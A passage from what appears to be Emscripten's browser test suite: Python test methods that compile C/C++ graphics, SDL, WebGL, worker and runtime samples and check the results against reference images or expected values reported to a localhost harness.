self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_proc(self):
open('side.c', 'w').write(r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'SPLIT_MEMORY=16777216', '-s', 'WASM=0']) # check for uniform4fv slice being valid in split memory
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
Popen([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types']).communicate()
self.set_setting('ASM_JS', 1)
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
for wasm in [0, 1]:
print(wasm)
main, supp = self.setup_runtimelink_test()
open('supp.cpp', 'w').write(supp)
Popen([PYTHON, EMCC, 'supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm]).communicate()
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
var assert = function(check, text) {
if (!check) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?9');
xhr.onload = function() {
window.close();
};
xhr.send();
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''' % self.test_port)
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
def test_mem_init_request(self):
def test(what, status):
print(what, status)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.test_port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 1000);
''' % self.test_port
open('pre_runtime.js', 'w').write(r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=1']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'NO_EXIT_RUNTIME=0'] + extra_args + mode)
print('sync startup, call too late')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'NO_EXIT_RUNTIME=0'] + extra_args + mode)
print('sync, runtime still alive, so all good')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write(post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
run_process([PYTHON, EMCC, path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]']).communicate()
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']).communicate()
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
Popen([PYTHON, EMCC, path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]']).communicate()
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1'], expected='8')
def test_preload_module(self):
open('library.c', 'w').write(r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
run_process([PYTHON, EMCC, 'library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'WASM=1'])
os.rename('library.wasm', 'library.so')
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '-s', 'WASM=1', '--use-preload-plugins'],
expected='0')
def test_mmap_file(self):
open(self.in_dir('data.dat'), 'w').write('data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
if not has_browser():
self.skipTest('need a browser')
Popen([PYTHON, EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html']).communicate()
outdir = os.getcwd()
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as startup directory,
# and the browser will not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to delete it. Therefore switch away from that directory
# before launching.
os.chdir(path_from_root())
args = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
browser = get_browser()
if browser is not None:
# If EMSCRIPTEN_BROWSER carried command line arguments to pass to the browser, (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun, so strip them out.
browser_cmd = shlex.split(browser)
browser_path = browser_cmd[0]
args += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and '-profile' in browser_args:
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args += ['--browser_args', ' ' + ' '.join(browser_args)]
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
process = subprocess.Popen(args)
process.communicate()
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert process.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut'], timeout=30)
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
Popen([PYTHON, EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'], stdout=PIPE, stderr=PIPE).communicate()
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
open('pre.js', 'w').write(r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=opts, expected='0', timeout=20)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0', timeout=20)
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
# Verify bug https://github.com/kripken/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0', timeout=20)
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0', timeout=20)
# Test for PR#5373 (https://github.com/kripken/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0', timeout=20)
def test_webgl2(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
def test_wget(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
